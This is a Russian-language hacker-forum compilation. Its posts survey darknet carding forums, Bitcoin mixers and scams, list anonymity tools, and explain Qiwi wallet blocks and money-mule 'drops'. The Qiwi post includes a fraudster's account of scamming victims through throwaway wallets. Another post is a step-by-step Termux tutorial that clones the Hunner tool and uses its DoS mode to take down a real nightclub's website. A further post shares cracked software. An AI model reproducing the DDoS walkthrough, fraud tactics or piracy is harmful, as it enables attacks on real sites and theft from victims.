текучки кадров. Хакерские форумы Для многих даркнет заканчивается на наркоплощадках, но это лишь одна из первых остановок в нашем путешествии по темной стороне интернета. В даркнете бывают и площадки, где за попытку нанять человека в наркобизнес пользователь получит пожизненный бан. Давай посмотрим, какие есть самые большие хакерские и кардерские форумы в российском даркнете. Среди англоязычных форумов примечателен DaMaGeLaB.IN — его пользователи занимаются исследованием и обсуждением хакинга, кодинга, малвари и прочих тем, связанных с ИБ. WWH-CLUB WWH — крупнейший из форумов русских кардеров. У него есть адрес и в клирнете, который до сих пор остается доступным даже с российского IP. Одна из особенностей площадки — предоставление образовательных услуг. За определенную сумму (порядка тысячи долларов) «менторы» форума обещают обучить любого новичка искусству кардинга, помочь со всеми вопросами и наставить на «счастливую и богатую» жизнь. Раньше регистрация на WWH позволяла найти тонну полезной информации, связанной с информационной безопасностью. В отдельных постах даже выкладывались лекции по кардингу, которые проводились в Jabber (а иногда и в Skype). Но открытая и бесплатная регистрация привела к засилью троллей и «школьников» — так тут называют неадекватных или ненадежных пользователей. Потому с недавнего момента администрация закрыла от новых пользователей все «сливки». Доступ к закрытым разделам теперь стоит 20 долларов США. На WWH оставили пару открытых разделов, но полезной информации там обычно не бывает. Verified В среде российских кардеров «Вериф» — это один из самых уважаемых долгожителей. Он, как и WWH, стал неким учебником кардеров и местом для общения, поиска информации и нужных для теневой работы людей. Регистрация на форуме стоит 50 долларов США, зарегистрироваться бесплатно невозможно. Но даже после оплаты доступа вести деятельность на «Верифе» проблематично, ведь к новичкам кардеры всегда относятся с опаской. Кто-то из старожилов сначала должен поручиться за новичка — только тогда он сможет начать что-то делать на форуме. То есть даже если пользователь приобрел полный доступ к форуму, вести дела без поручительства или депозита он не сможет. Exploit.in Этот форум посвящен в основном хакерской тематике. В отличие от «Верифа», регистрация на «Эксплоите» пока бесплатная, но, чтобы получить доступ к форуму, пользователю необходимо предоставить администрации ссылку на свои аккаунты на других бордах. Аккаунты должны быть с репутацией и регистрацией от одного года, в противном случае администрация отказывает пользователям в предоставлении доступа. Exploit.in уважают в российском даркнете, да и западные коллеги сюда иногда заглядывают. Основной контингент — это кардеры, которые предлагают свои услуги — от создания сайтов до предоставления ботнетов. Ресурс доступен в клирнете, также у него есть сервер Jabber, почитаемый пользователями не меньше самого форума. Probiv Если в постах на Exploit, WWH и Verified авторы часто пишут, что они «не работают по ру и СНГ» (что означает нежелание проворачивать темные дела на территории родного или близлежащего государства), то «Пробив» популярен именно среди мошенников, работающих в России и СНГ. Отличительная черта форума — он почти полностью посвящен «пробивам», то есть за определенную сумму на форуме можно узнать информацию об определенном человеке: от кредитной истории до паспортных данных. Тут же можно встретить и торговлю «схемами заработка»: человек предоставляет администрации документ с мануалом по заработку в Сети (или в офлайне), после проверки материала его публикуют в определенной ветке форума и продают пользователям. Разброс цен за такие «схемы заработка» — от пары тысяч рублей до нескольких миллионов. Все зависит от потенциального профита. Популярные услуги и товары Все перечисленные форумы с готовностью предлагают работу специалистам. Популярность разных видов вакансий варьируется в зависимости от направленности форума: на WWH ищут умелых кардеров, на «Экплоите» нужны кодеры, а «Пробив» в основном ищет дропов под ООО и микрозаймы. И конечно, везде процветает торговля: на WWH можно купить данные чужой кредитной карты, на «Эксплоите» — ботнет или сайт, а «Пробив» предоставит паспортные данные, взломанные аккаунты и много чего другого для теневой деятельности. Общение Некоторые площадки так и не определились с основным направлением и предлагают всего понемножку. Другие предназначены исключительно для анонимного общения. Пройдемся по нескольким популярным местечкам. Runion «Рунион» — это уникальное место, где представлено вообще все, что есть в российском даркнете. Здесь предлагают купить оружие и наркотики, общаются на политические темы и узнают о работе спецслужб. Недавно администрация Runion запустила свою площадку для наркоторговли под названием Solaris (правда, там совсем безлюдно). Если покопаться в темах форума, можно узнать, как избавляться от трупа, провозить запрещенные вещества через границу или даже сменить личность, — «Рунион» даст нужную информацию и нужных людей. Однако пробовать пользоваться этими услугами мы не советуем никому. Это крайне опасно не только из-за проблем с законом, но и потому, что за маской анонима может скрываться кто угодно. Также на форуме можно приобрести занятные мануалы по сетевой безопасности. Впрочем, такие вещи встречаются и на других форумах. Торговля оружием тоже не редкость в даркнете. До «Руниона» существовал другой аналогичный форум, и даже название было похожим — RuOnion. Однако он закрылся, и о причинах никто не знает. Chat with stranger Общение с незнакомцем в эпоху Tinder, Badoo и прочих специализированных сервисов — это уже не что-то сверхъестественное. Впрочем, Chat with stranger имеет важное отличие — тут ни собеседник, ни владельцы сервиса совершенно точно ничего о тебе не знают. Обычно в онлайне всего где-то 40–50 человек, но дождаться появления собеседника можно без труда. Увы, далеко не всегда это адекватные личности, которые горят желанием общаться на предложенные темы, однако в этом тоже может быть свой шарм. «НС-форум» Это форум, посвященный теме национал-социализма. На нем единомышленники делятся книгами, идеями и историями своей жизни. Если «Рунион» — частично форум, частично торговая площадка, то здесь исключительно общение. От некоторых разделов буквально волосы встают дыбом, поэтому если ты против любого насилия, то лучше обходи этот форум стороной. Есть, впрочем, и полезная часть, посвященная информационной безопасности. Например, как установить Tails, какой выбрать VPN, как зашифровать флешку и так далее. Но если «Рунион» и «Экплоит» озабочены этими вещами в связи с нелегальной деятельностью и мошенническими схемами, то «НС-форум» предоставляет их из идеологических соображений. К тому же некоторые участники движения имеют проблемы с законом и стараются скрывать свою деятельность. Другие места для общения На этом список чатов и форумов не заканчивается — в .onion есть даже зеркало Facebook, но вряд ли оно сможет спасти от наказания за репост. Еще, например, есть форум Tor4, где пользователи обмениваются своими трип-репортами (то есть описаниями ощущений от приема наркотиков) и обсуждают влияние того или иного вещества на организм. В даркнете встречаются и куда более пугающие форумы: педофилы, садисты, террористы, но по понятным соображениям «Хакер» не будет публиковать ссылки на их сайты. Если тебе уж очень хочется найти что-то подобное, открывай каталоги по ссылкам из начала этой статьи и ищи. Но постарайся все же не задерживаться там слишком долго и береги психическое здоровье! К тому же нам еще предстоит пройтись по экономической части даркнета. Деньги в даркнете: кошелек или лук! В даркнет обычно приходят либо для полностью анонимного общения, либо (гораздо чаще) обделывать темные делишки. Поэтому тут множатся и обменники, и сервисы по обналичке, и услуги дропов. Но прежде чем что-то делать с деньгами, их нужно куда-то положить. Еще в 2016 году на форумах ломали голову — анонимен ли биткойн? И можно ли использовать его для грязных дел? К несчастью для теневого бизнеса — криптовалюта оказалась неанонимной. Все чаще в новостях можно увидеть, как полиция задерживает очередного кодера или хакера, который хранил свои деньги в биткойнах. Но любая проблема — это прежде всего вызов, а в даркнете их ой как любят. Например, Rahakott функционирует как обычный биткойн-кошелек, но в него уже встроен микшер. Как это работает? Человек отправляет ему определенную сумму (предположим, два биткойна), тот маленькими частями рассылает деньги на другие кошельки, а затем собирает деньги на другом кошельке, расположенном на Rahakott. Получается, что отследить транзакцию почти невозможно, ведь суммы поступают маленькими частями с сотни разных адресов. Подобные микшеры считаются гораздо более надежными, чем просто кошельки, и их услуги пользуются популярностью. Но далеко не все из них работают, как обещают владельцы, а некоторые совсем не переводят деньги, оставляя их себе. Есть, кстати, и просто микшеры без встроенных кошельков, например MixerMoney. Связующим звеном между биткойнами и наличными (или электронными) деньгами выступают обменники. В даркнете, как и в клирнете, их огромное количество. На WWH или на «Эксплоите» масса рекламных ссылок. Как правило, те же сайты предоставляют и услуги «обнала», то есть человек просто отправляет свои биткойны, а получает наличные деньги через курьеров или закладку. Если собираешься воспользоваться подобными услугами, помни, что действуешь на свой страх и риск: на многих форумах часто можно встретить комментарии о том, что тот или иной обменник «соскамился» (то есть начал обманывать клиентов и забирать деньги себе). Вообще даркнет и скам — понятия неразрывные. Скам в .onion Вслед за деньгами и успехом популярность обычно приносит и разные проблемы. Но если популярным актерам всего лишь подражают, то популярные сайты в даркнете просто подделывают с целью нажиться на незнании пользователей. Например, если вбить слово Hydra в поисковик Candle, наверху в поисковой выдаче будут фейки. Там все как на настоящей «Гидре», но вместо адреса закладки пользователь получит «пустоадрес» (где ничего не найдет) либо просто бан. В пределах самого форума от этого страхуют гаранты: они выступают посредниками при сделке и переводят деньги продавцу, только когда покупатель подтвердит получение. Но если форум поддельный, то поддельным будет и гарант. Такие форумы, как правило, находятся очень легко — ссылки на них попадаются в выдаче поисковиков как по даркнету, так и по клирнету. Если видишь потрясающую сделку типа нового iPhone за полцены, схемы заработка а-ля «заработай миллион» стоимостью в несколько тысяч рублей, «заливы» (то есть перечисление денег с украденной карты) и прочие заманчивые предложения, то, скорее всего, это скам. Гарантом на мошеннических площадках обычно выступает один человек, который после получения нужной суммы просто отправит жертву в бан без объяснения причин. Хотя порой администрация может что-нибудь и выдумать, чтобы это смотрелось более органично. В даркнете есть и множество обменников, которые действуют по схожему принципу: просто забирают криптовалюту и не отдают ее. Самый верный способ не попасться на удочку мошенника — не использовать ссылки с непроверенных источников (только с проверенных каталогов) и всегда проверять адрес ресурса, ведь на первый взгляд можно его можно и не отличить. Конец приключения Каждый год в даркнете массово появляются, переезжают и исчезают сайты. Да, большая часть из них посвящена торговле запрещенным или скаму, но есть и места, которые позволяют общаться на волнующие темы или почитать истории из жизни незнакомых людей. В целом это холодное и неуютное место, но при этом крайне интересное. А уж что конкретно привлечет твое внимание, зависит только от тебя. Береги себя!
  21. Приветствую хацкеры, в связи с тотальной прослушкой интернет-каналов и прозрачностью коммерческих интернет-компаний перед государственными органами сейчас остро встал вопрос о мерах противодействия. Для пользователя самый эффективный вариант — использование криптографических инструментов и децентрализованных сервисов. Ниже предоставлен список доступных способов анонимизации и защиты своих прав. Использовать на свой страх и риск. AnoNet — децентрализованная сеть между друзьями с использованием VPN и программных BGP-маршрутизаторов. http://wiki.ucis.nl/Anonet BitPhone — мобильное коммуникационное устройство, работающее на базе децентрализованной сети в стиле Bitcoin. https://bitphone.net/#home BitMessage — коммуникационный протокол P2P, используемый для обмена зашифрованными сообщениями от одного пользователя ко многим подписчикам. https://bitmessage.org/wiki/Main_Page Commotion Wireless open source коммуникационный инструмент, работающий на мобильных телефонах, компьютерах и других беспроводных устройствах для создания децентрализованных mesh-сетей. https://commotionwireless.net Cryptosphere — распределенное зашифрованное облачное хранилище на базе модели данных Git. https://github.com/cryptosphere/cryptosphere Drogulus (WIP) — программируемое P2P-хранилище данных с поддержкой криптографии. http://drogul.us Сеть eDonkey — файлообменная децентрализованная сеть для обмена большими файлами. http://en.wikipedia.org/wiki/EDonkey_network Freenet — свободное программное обеспечения для анонимного обмена файлами, публикации сайтов (доступны только через Freenet), чатов и форумов. https://freenetproject.org Freifunk — некоммерческая инициатива по созданию свободной децентрализованной mesh-сети. Прошивки Freifunk основаны на OpenWRT и OLSR или B.A.T.M.A.N. http://wiki.freifunk.net/Kategorie:English GNUnet — фреймворк для безопасных peer-to-peer коммуникаций без использования центральных или промежуточных серверов. https://gnunet.org Grimwire — браузерное приложение, которое использует Web Workers для изоляции процессов и WebRTC для peer-to-peer коммуникаций. https://github.com/pfraze/grimwire Guifi — европейская (преимущественно, испанская) большая mesh-сеть с более чем 22000 активными узлами WiFi и 25 км оптоволокна. http://guifi.net Hyperboria - ставит целью создание устойчивого децентрализованного альтернативного интернета. https://hyperboria.net I2P — анонимизирующая сеть, использующая несколько уровней шифрования. https://geti2p.net/ru Kademlia — распределенная хэш-таблица для P2P-сетей. http://en.wikipedia.org/wiki/Kademlia NameCoin — распределенная система DNS на технологии Bitcoin. http://namecoin.info Nightweb — экспериментальное приложение для Android или ПК, которое позволяет публиковать контент и общаться через BitTorrent поверх I2P. https://sekao.net/nightweb LibreVPN — виртуальная mesh-сеть с конфигурационными скриптами, позволяющими поднять собственный mesh-VPN. http://librevpn.org.ar OpenNIC Project — открытый и демократичный альтернативный DNS-провайдер. http://www.opennicproject.org Osiris — ПО для децентрализованного портала, управляемого и работающего по P2P. http://www.osiris-sps.org PeerCDN — автоматически раздает статичные ресурсы на сайте (изображения, видео, файлы) через P2P-сеть, составленную из посетителей, который в данный момент находятся на сайте. https://peercdn.com PeerCoin/PPCoin — первая криптовалюта, основанная на реализации одновременно систем proof-of-stake и proof-of-work. http://ppcoin.org PeerServer — пиринговая клиент-серверная технология, с использованием WebRTC, где ваш браузер работает как сервер для других браузеров через пиринговые P2P-каналы WebRTC. http://www.peer-server.com Phantom — система децентрализованной интернет-анонимности. https://code.google.com/p/phantom Project Byzantium — Linux-дистрибутив с поддержкой беспроводных mesh-сетей, который обеспечит связь в случае стихийного бедствия или аварии интернет-провайдера. http://project-byzantium.org Quick mesh project — прошивка на базе OpenWRT для создания mesh-сетей. http://qmp.cat/Home RetroShare — open-source, децентрализованная коммуникационная платформа для чатов и обмена файлами. http://retroshare.sourceforge.net Serval Project позволяет осуществлять звонки между мобильными телефонами без использования базовых станций. http://www.servalproject.org Syndie — немецкая open-source система для поддержки распределенных форумов. http://syndie.i2p2.de Tahoe-LAFS — свободная распределенная файловая система с дублированием информации. https://tahoe-lafs.org Telehash — новый криптографический протокол на базе JSON, позволяющий быстро создавать защищенные P2P-приложения. http://telehash.org FNF — организация Free Network Foundation для информационной поддержки в создании локальных беспроводных сетей. https://thefnf.org Tonika — распределенная социальная сеть, в которой коммуникации осуществляются напрямую между друзьями. http://pdos.csail.mit.edu/~petar/5ttt.org Tor — многоступенчатая сеть анонимайзеров, браузер. https://www.torproject.org Tox — проект, ставящий целью создать P2P-альтернативу Skype. https://tox.chat Tribler — проект по созданию интернета, свободного от цензуры, развивается уже восемь лет. Торрент-клиент работающий через сеть Tor. http://www.tribler.org Unhosted — бессерверные веб-приложения, которые исполняются в браузере клиента. https://unhosted.org Vole — социальная сеть в браузере, без центрального сервера, использует Bittorrent, Go и Ember.js, а также Bittorrent Sync. http://vole.cc ZeroNet - сеть распределённых децентрализованных веб-сайтов на основе Bitcoin. https://zeronet.io ZeroTier One — open source приложение для создания огромных распределенных Ethernet-сетей. Используется end-to-end шифрование для всего трафика. Есть коммерческая и бесплатная версия. https://www.zerotier.com Помните: используя криптографические (шифровальные) системы, вы не нарушаете закон — вы защищаете своё право на анонимность. И запомни, твой анонимен только в гробу. Но и там тебя на изи найдут, если понадобится.\
  22. Разблокировка: Письмо в техподдержку со сканом договора сим карты и паспорта, просят объяснение экономической сути операций в письменном виде. Пополнение через терминал: Пополнение через терминал за раз более 30тыс рублей срабатывает автоблокировка. Разблокировка: в течение 3х дней автоматически снимается блокировка или напишите в тех. поддержку для ускорения процесса. Вход с разных IP адресов: В кошелек заходят с разных стран, vpn или через Tor браузер, автоматическая блокировка (ограничение на исходящие платежи) Разблокировка: Письмо в техподдержку, как повезет, могут разблокировать или потребовать сканы документов. Это главные причины блокировки киви кошелька. Важно! не регистрируйте Qiwi на сим карты без договора и скана паспорта, в противном случае Вы потеряете деньги и время. Предыстория Пару дней назад мне понадобилось оплатить одну услугу через Qiwi. Цена вопроса там была смешная — около 500 рублей, тем не менее продавец этой услуги её не выполнил и начал всячески юлить и тянуть время. Стало понятно, что результат будет только отрицательный, поэтому я потребовал возврат денег. Естественно, я столкнулся с очередными просьбами подождать, и только когда сказал, что оставлю негативный отзыв в месте покупки данной услуги, деньги были возвращены. Правда, с пометкой, что я ещё пожалею об этом :) И вот через 20 минут с интервалом в минуту мне приходят шесть переводов по 1 рублю с левого номера Qiwi Мягко говоря, стрёмно. Ну что, я сразу позвонил на горячую линию Qiwi (а если бы это была ночь?), где обрисовал ситуацию. Оттуда меня направили в службу безопасности (на сайте форма), где я подробно всё описал. И выдохнул, как оказалось — зря. Хотя в этот день еще сделал пару переводов на другой кошелек, да телефон пополнил — всё было ок. На следующий день меня ждал сюрприз А на почте ещё веселее: Я должен предоставить экономическое обоснование перевода на сумму 1 рубль. Фото с паспортом. И это при том, что я пользователь Qiwi со статусом: Как оказалось, пофиг на этот статус, если любой дурак тебя может заблокировать за 6 рублей. На горячей линии по-прежнему говорят, что мой вопрос рассматривается, и ему даже повысили приоритет, но выводы отсюда только такие: Никогда не платить в интернете со своего основного кошелька. Никогда не хранить суммы больше той, которой не жалко забыть в случае чего. Не иметь дело с Qiwi, потому что система дырявая. Обновление: поддержка сказала, что им не нравится мой договор и чтобы я шел к оператору и выяснял там. Паспорт, личное присутствие и статус «Профессиональный», — всё это можно выкрасить и выбросить. 6 рублей, Карл. Не так давно (около 6-7 месяцев назад) контора КИВИ серьезно реорганизовала свою службу безопасности. Причин на это было много. И как бы они это не отрицали, но все они сводятся к первой из списка. Собственно, вот весь список: Все, что лежит на блокнутых кошельках и не востребовано в течение 6 месяцев - уходит в фонд компании КИВИ. Огромное количество жалоб на то, что мамонтов кинули на бабки. Появление "копилки". Это самое хреновое, что могло случиться... Почему? Расскажу позже. Изменение политики КИВИ. Полная безопасность КИВИ, даже в случае их ошибки. Как итог - вы не сможете сделать ничего и просто подарите деньги. А теперь подробно. Да, все что не было в движении полгода, отходит в "фонд мира". Все, что требуется - не пользовать сумму на кошельке. Прикольно, да? А теперь, уважаемые знатоки, внимание, вопрос. Как пользоваться кошельком, если он заблокирован? Комментарии излишни. Жалобы. Это очень интересная тема. Вы знали, что достаточно одной жалобы на один кошелек, чтобы забанили все, которыми вы пользовались? Не, не знали? А почему? А потому что все ваши ИП и МАКи записываются и катологизируются. Зачем? Очень интересный и правильный вопрос. А вот зачем - как только поступает жалоба на один кошелек, сразу же поднимается ийпишник, с которого заходили на него. Ищутся совпадения. И вуаля - все ваши кошельки на блюдечке. Удобно, не правда ли? Но даже этого мало... Плаксивая история из жизни... В прозе... "Из среднего"... Сидел я вконтакте. Никого, кроме мамонтов, не трогал... И тут случился мамонт с готовностью оплатить на кивикопилку. Оплачивает. Через 5 минут прилетает бан. Ладно. Херня, бывает. Идем к деду(дедик), разворачиваем там новый кошель, разводим другого мамонта по другой теме. И бам... кошелек отлетает в бан. Вспоминаем, думаем. Короче, если опустить все подробности... Есть очень серьезные подозрения, что вконтакте и КИВИ очень плотно сотрудничают в плане безопасности. Ну или ВК тупо сливает КИВИ интересующую инфу. Тут уж я не знаю точно. Такая вот куетень... Идем дальше... Почему не стоит восстанавливать кошелек? Кроме очевидного? Начнем с того, что вам нужно сделать 3 фото. Нет, не своего члена... 1 - с паспортом у лица, чтобы отчетливо были видны надписи. 2 - договора с оператором сотовой связи. 3 - паспорта. Именно фото, господа. Забавно, да? Вот вам еще забавность - СБ могут не понравиться ваши фото. По разным причинам, которые, к слову, СБ может и не озвучивать. Поэтому, будьте готовы сделать и 4 и 5 и 10 фото. Так что мастера фотошопа, тут без вас... Увы. Но и это не все. После всего этого дерьмища ваш кошелек не восстановят. Вас попросят предоставить номер банковского счета, куда перевести деньги. И все. Забудьте о кошельке. Как копилка изменила все? При введении копилки поменялась структура СБ компании. Из нее были убраны нихрена не делающие люди и наняты реальные профи своего дела. Некоторые, к слову, из хакерских кругов. Откуда инфа - не спрашивайте) просто знаю. Зачем это все? Потому что при появлении копилки весь даркнет накинулся на нее, как голодная собака на кусок мяса. А теперь самая удручающая мысль... На это и был расчет! Робин Гуд снова среди нас, господа! Идеальный изящный ход. Сделать инструмент анонимности для мошенников, чтобы легко забирать у них деньги. Круто, не правда ли? Учитесь у КИВИ, как надо работать! Я потерял бабло. Что мне теперь делать? Не удивлюсь, если людям с такими вопросами уже написали суперхакеры, которые за каких-то 5, 10, 15к предоплаты восстановит кошелек. Думаю, вы уже поняли, что эти ребята - суперспецы. Они все сделают, восстанов... не, ну я не могу это писать. Это же реально смешно) Короче - единственный выход для вас - забудьте. Деньги не вернуть. КИВИ сделал для этого все. Но если вы - тотальный мазохист-извращуга - можете пытаться. В качестве заключения. Сегодня было создано для теста 2 кошелька. Один из них был оформлен с палевного IP. Второй - чистый и девственный. Первый улетел в бан после залива на него 2000. Второй живет до сих пор. И есть подозрение, что будет жить еще долго. Чем дальше, тем хуже. Медленно, но верно переходите на другие сервисы. И забудьте о копилке для черных и серых дел.
  23. Сначала нужно установить Termux из Play Маркет Далее открываем Termux. Прописываем pkg update pkg upgrade При: Do you want to continue? Пишем: Y Для работы этой штуки нам понадобится питон (но не питон2). apt install python && apt install git -y Также введём ссылку на код с гитхаба: git clone https://github.com/b3-v3r/Hunner После того, как всё будет установлено, запускаем! (тут Hunner обязательно с большой буквы) cd Hunner Далее с маленькой chmod 777 hunner.py Обращайте внимание на большие и маленькие буквы, так-же пробелы и знаки. Также нужно будет сохранить всё то, что мы уже сделали: apt update && apt upgrade -y ДАВАЙТЕ НАЧНЁМ ДУДОС! Теперь, когда мы заходим в Termux, просто вводим: cd Hunner python hunner.py Открывается менюшка. Вообще, тут много всего: 1. искать уязвимость сайта. 2. провести DoS атаку на сайт 3. брутфорсить почты, загрузив предварительно словари паролей (как по мне, очень медленно) Будем дудосить... сайт местного клубешника :) Проверяем - работает. Вводим здесь Low Dos. Побежали строчки. Через некоторое время начинаем обновлять страницу и проверяем, как там наш сайт. Упал))) Упадёт не сразу. Но после пары раз дудосов он начал падать буквально через секунд 10 после запуска, не знаю, с чем это связано. Когда Дудосил с 2ух телефонов, то разницы особо не увидел. Возникает вопрос - а почему Low Dos, а не более эффективные там же, в меню. Потому что для всех и легко. Если интересны более сложные и более действенные методы прошу в приват канал. Так как публиковать подобное можно ТОЛЬКО в частных каналах.
  24. admin

    Крякнутый InstaSoft

    Ну что, крякнутый InstaSoft? Попал в руки кряк программы, версия 4.5.0.0, выкладываю ее "как есть", использовать на свой страх и риск Программа не нуждается в представлении, но если что, то тут можно почитать про нее ТУТ При запуске программы нажмите "Перейти к ознакомлению с программой" и перезапустите, все, программа пролечена Скачать программу: ЗДЕСЬ
  25. Кто такие Дропы и почему им так много платят? Приветствую хацкеры, сегодня рассмотрим данную вакансию, и сколько может заработать ДРОП и стоит ли оно того. Дроп – это подставное лицо, предназначенное для промежуточного приема товаров/банковских переводов/посылок/и т.д. и т.п. Почему же промежуточного? В любой такой схеме Дроп занимает позицию звена, получающего что-то за долю. Немного терминологии: Дроповод - Человек, имеющий в распоряжении дропов. Выцепляемые дропы - Это дропы, к которым есть физический выход, в том числе даже через сеть. Невыцепляемые дропы - Это дропы, к которым нет никакого выхода. Ручные дропы - Это дроп, который охотно идет с нами на контакт, он выполняет все указания, которые от него требуются Не ручной - Это дроп, который выполняет заранее указанную задачу. Разводной дроп - Это человек, который стал дропом неосознанно. Неразводной дроп - Это дроп будто компаньон. То есть его завербовали открыто, не разводя, не обманывая. Такие дропы очень популярны, потому что часто на них можно положиться, ведь они хотят получать прибыль со своего ремесла. Для них быть дропом - что то вроде профессии. Чаще всего такие люди получают деньги за обналичивание. Эти деньги украдены с чужих карт и счетов. А человеку либо переведут деньги на его карту, либо на специально сделанный белый пластик (специально сделанная карта), с которой потом нужно снимать деньги в банкомате. Зарплата дроппера — это или процент от обналичиваемой суммы, или единовременная выплата за выпуск и передачу мошеннику своей карты. Раньше дропам платили до 40% от суммы обналичивания украденных денег. В зависимости от квалификации тяжести преступления дропу грозит до пяти лет и штраф на 500 000 рублей, либо отправить на принудительные работы — тоже до пяти лет. Если суд выяснит, что вы работали в группе, то срок тюремного заключения может достигать семи лет. А если с Вас начинают просить деньги за доставку карт для обнала - то это просто схема мошенничества, где на Вас пытаются заработать. Простой развод. Это скрытая под работой дропа схема по выманиванию денег. Такого тоже полно. Ведь как мысль работает: если вы заплатили за странную схему деньги, а Вам ничего не прислали, то Вы не пойдете в полицию с заявлением, так как хотели поучаствовать в преступлении. Заключение: Тот же "Заработок в сети" только наивных лохов обрабатывают, так что и процентов платить не надо, а все следы, как у зайца убегающего, и запутывать ничего не надо, всё к наивным простакам. Вывод: ДРОП - мусор, который используют мошенники дабы огородить себя в случае чего все ниточки будут вести к дропу а дроповод остается не при делах.